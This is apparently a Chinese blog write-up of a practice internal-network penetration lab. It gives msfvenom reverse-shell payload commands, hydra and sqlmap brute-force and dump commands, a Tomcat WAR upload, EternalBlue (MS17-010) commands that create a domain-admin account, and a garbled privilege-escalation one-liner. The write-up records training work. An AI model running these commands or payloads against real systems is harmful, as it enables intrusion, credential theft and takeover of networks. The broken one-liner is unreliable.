一開始的時候?qū)φ麄€內(nèi)網(wǎng)的拓撲結(jié)構(gòu)還不熟，所以做的時候有很多方法都沒有想到去用,大家多多指教。

一、環(huán)境準備

用網(wǎng)線連接交換機

配置Winodwss攻擊機IP為172.16.6.203

攻擊機Kali IP為172.16.6.202

主機IP為172.16.6.201

網(wǎng)關(guān)為172.16.6.1

子網(wǎng)掩碼255.255.255.0

目標IP 172.16.6.10

二、滲透具體流程

總覽拓撲圖

一開始以為192.168.6.200，一臺普通的雙網(wǎng)卡主機，沒有發(fā)現(xiàn)是防火墻，所以10.1.1.0網(wǎng)段的主機拓撲不夠清晰，后來老師講了才知道，防火墻做了端口映射。E主機的445端口映射到防火墻445端口，F主機的3389端口映射到防火墻的3389端口。

攻擊目標172.16.6.10

1、菜刀連接

訪問主頁。發(fā)現(xiàn)偽協(xié)議注入點。

http://172.16.6.10/index.php?page=php://input

使用菜刀連接，菜刀版本需2020年的版本。

2、生成并上傳木馬且回連meterpreter

查看phpinfo目標主機為Linux系統(tǒng)的主機。

Msf生成木馬msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.6.147 LPORT=2337 -f elf -a x86 —platform linux -o /home/hula.elf

并use exploit/multi/handle模塊監(jiān)聽木馬回連情況。

將木馬通過菜刀上傳木馬，賦予運行權(quán)限，然后執(zhí)行。

發(fā)現(xiàn)回連到meterpreter。

3、內(nèi)網(wǎng)信息收集（同時添加路由并建立socks代理）

ipconfig查看網(wǎng)卡信息，發(fā)現(xiàn)有兩個網(wǎng)段的IP，分別為172.16.6.10和192.168.6.10。

自動添加路由run post/multi/manage/autoroute。

添加路由與代理：

use auxiliary/server/socks4a

show options

set srvhost 172.16.6.147

set srvport 1080

使用portscan模塊進行端口掃描

search portscan

set rhosts 192.168.6.0/24。

ipconfig查看網(wǎng)卡信息，發(fā)現(xiàn)有兩個網(wǎng)段的IP，分別為172.16.6.10和192.168.6.10

給msf添加192.168.6.10段的路由，run autoroute -s 192.168.6.0/24

添加代理：

use auxiliary/server/socks4a

show options

srvhost設(shè)為本機

srvport默認1080

可以看到掃描出15、16、17、200四臺主機，端口開放情況為

192.168.6.15 21/22

192.168.6.16 22/80/3306/8080

192.168.6.17 22/80/3306

192.168.6.200 80/135/445/3389

4、嘗試本機提權(quán)

用一句話提權(quán)

printf “install uprobes /bin/sh” > exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u whatever exploit.conf” staprun -u whatever> exploit.conf; MODPROBE_OPTIONS=”-C

攻擊目標192.168.6.15

1、hydra爆破ftp賬號

因為目標機開放了21端口，用hydra爆破ftp弱密碼。

proxychains hydra -L /usr/wordlists/字典/Usernames/top_shortlist.txt -P /usr/wordlists/rockyou.txt -f -t 50 -vV ssh://192.168.6.15 -o ./ssh.log

爆破出賬號為admin，密碼為123456

2、登錄ftp服務

proxychains ftp 192.168.6.15，登陸后用dir命令發(fā)現(xiàn)報錯

使用xshell連接，發(fā)現(xiàn)可以連接。

攻擊目標192.168.6.16

1、發(fā)現(xiàn)tomcat

由于目標主機開發(fā)了8080端口，猜測有tomcat漏洞。

訪問網(wǎng)頁192.168.6.16：8080發(fā)現(xiàn)有tomcat頁面。

2、MSF爆破tomcat密碼

下面嘗試利用MSF爆破tomcat的賬號密碼，利用auxiliary/scanner/http/tomcat_mgr_login模塊，除了設(shè)置目標IP，用戶名字典，密碼字典外，再設(shè)置stop_on_success為true，意思是baopochen成功后停止。

默認管理后臺路徑為manager/html，也不用改，端口也不用改。成功爆破得到賬號密碼為tomcat/tomcat

3、繼續(xù)攻擊取得shell

使用msf中upload、deploy兩個模塊的tomcat漏洞發(fā)現(xiàn)無法綁定IP和端口。

使用msf生成war木馬文件。然后使用監(jiān)聽模塊監(jiān)聽木馬回連情況。

msfvenom -p java/meterpreter/reverse _tcp LHOST=192.168.6.10 LPORT=20003 -f war > lmx3.war

在下面的頁面上傳war木馬文件。

在網(wǎng)頁上查看自己的木馬，返回msf發(fā)現(xiàn)已返回meterpreter

攻擊目標192.168.6.17

1、SQL注入進后臺

訪問該站點。

kali下敏感目錄掃描工具Nikto使用：攻擊機：172.16.6.147（kali linux）、靶機：192.168.6.17 ( Metasploitable2-Linux)、使用Nikto 進行敏感目錄掃描、參數(shù)解析：-h/-host 指定域名或者IP、發(fā)現(xiàn)這個敏感目錄掃描不夠強大。

發(fā)現(xiàn)sql注入點http://192.168.6.17/message.php?id=

用手工簡單的測試了下：

http://192.168.6.17/message.php?id=1?頁面正常

http://192.168.6.17/message.php?id=1?order by 1頁面正常

http://192.168.6.17/message.php?id=1?order by 100頁面不正常

所以存在注入漏洞

sqlmap跑出數(shù)據(jù)庫的密碼

proxychains sqlmap -r /home/17tou.txt —batch –dbs

proxychains sqlmap -r /home/17tou.txt —batch —dbs -T admin –dump

最后爆出賬號是admin,密碼是xxxxxxx，使用md5解密

利用賬號密碼成功登錄192.168.6.17的后臺

2、MSF生成php木馬反彈meterpreter

瀏覽頁面，發(fā)現(xiàn)有一個文件上傳的注入點。上傳木馬，f12發(fā)現(xiàn)木馬上傳的位置與命名。

http://192.168.6.17/upload/images/20201022123044.php

在win10上安裝sockscap，管理員身份運行，代理設(shè)置kali的IP地址，端口1080。在sockscap上添加菜刀程序。使用菜刀連接木馬。

2、MSF生成php木馬反彈meterpreter

通過菜刀連接，發(fā)現(xiàn)目標主機為Linux系統(tǒng)。

用MSF生成的反彈木馬，然后起監(jiān)聽。

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.6.10 LPORT=2339 -f elf -a x86 —platform linux -o /home/biu.elf

通過菜刀上傳到目標主機，賦予權(quán)限，然后運行。發(fā)現(xiàn)不能彈回meterpreter。

攻擊目標192.168.6.200

1、嘗試訪問web服務

因為發(fā)現(xiàn)目標開放了80，所以訪問下web站點

在kali自帶的火狐瀏覽器中設(shè)置socks代理，訪問192.168.6.200,發(fā)現(xiàn)頁面提示輸入賬號密碼。嘗試了弱口令的賬號密碼，發(fā)現(xiàn)無法人工爆破。

2、永恒之藍攻擊

由于目標開放了445端口，所以懷疑可能存在永恒之藍漏洞。

使用ms17-010的command模塊進行攻擊。

添加用戶，并添加至管理員組（或者直接修改administrator管理員密碼）

• ?
• ?

set command ‘net user cbr Cbr123456 /add‘set command ‘net “Domain Admins” cbr /add /domain’

用命令set command ‘net group “Domain Admins”‘來查看是否成功添加到域管理員組。

3、遠程登錄

proxychains rdesktop 192.168.6.200

查看IP信息ipconfig /all，發(fā)現(xiàn)目標主機在域里面。網(wǎng)關(guān)為10.1.1.1，還有一個地址為10.1.1.200，以為目標主機位雙網(wǎng)卡，但沒有發(fā)現(xiàn)目標主機的地址192.168.6.200的存在，驚天大怪事啊。后來講解的時候才知道，這里是做了端口映射。

攻擊域成員機10.1.1.200

1、創(chuàng)建用戶并加入到域管理員組

由于目標開放了445端口，所以懷疑可能存在永恒之藍漏洞。

繼續(xù)用17010執(zhí)行高權(quán)限命令的模塊進行攻擊：

添加用戶，并添加至管理員組（或者直接修改administrator管理員密碼）

• ?
• ?

set command ‘net user cbr Cbr123456 /add‘set command ‘net “Domain Admins” cbr /add /domain’

用命令set command ‘net group “Domain Admins”‘來查看是否成功添加到域管理員組。

發(fā)現(xiàn)已經(jīng)成功添加到域管理員組

2、用創(chuàng)建的域管理員登錄域環(huán)境

遠程登錄10.1.1.200

使用共享文件proxychains rdesktop 10.1.1.200 -r disk:aa=/home

遠程登錄administrator

上傳木馬并運行，發(fā)現(xiàn)meterpreter彈不回來，遂放棄

攻擊域控10.1.1.10

1、猜測端口轉(zhuǎn)發(fā)

以10.1.1.10為目標地址，使用msf的ms17-010模塊攻擊，發(fā)現(xiàn)操作并沒有在10.1.1.10上執(zhí)行，而是在192.168.6.200上執(zhí)行。猜測是進行了端口映射。

所以將192.168.6.200作為中間機器，使用lcx，但發(fā)現(xiàn)無法實現(xiàn)端口轉(zhuǎn)發(fā)。

使用xshell建立192.168.6.200與10.1.1.10之間的隧道，但發(fā)、法建立。遂放棄。

最后

通過ms17-010的command模塊可以添加用戶，但是command后面的指令要加單引號，因為是長命令。

遠程登錄10.1.1.10

總結(jié)

以上是生活随笔為你收集整理的记一次糟心的内网靶场实战的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。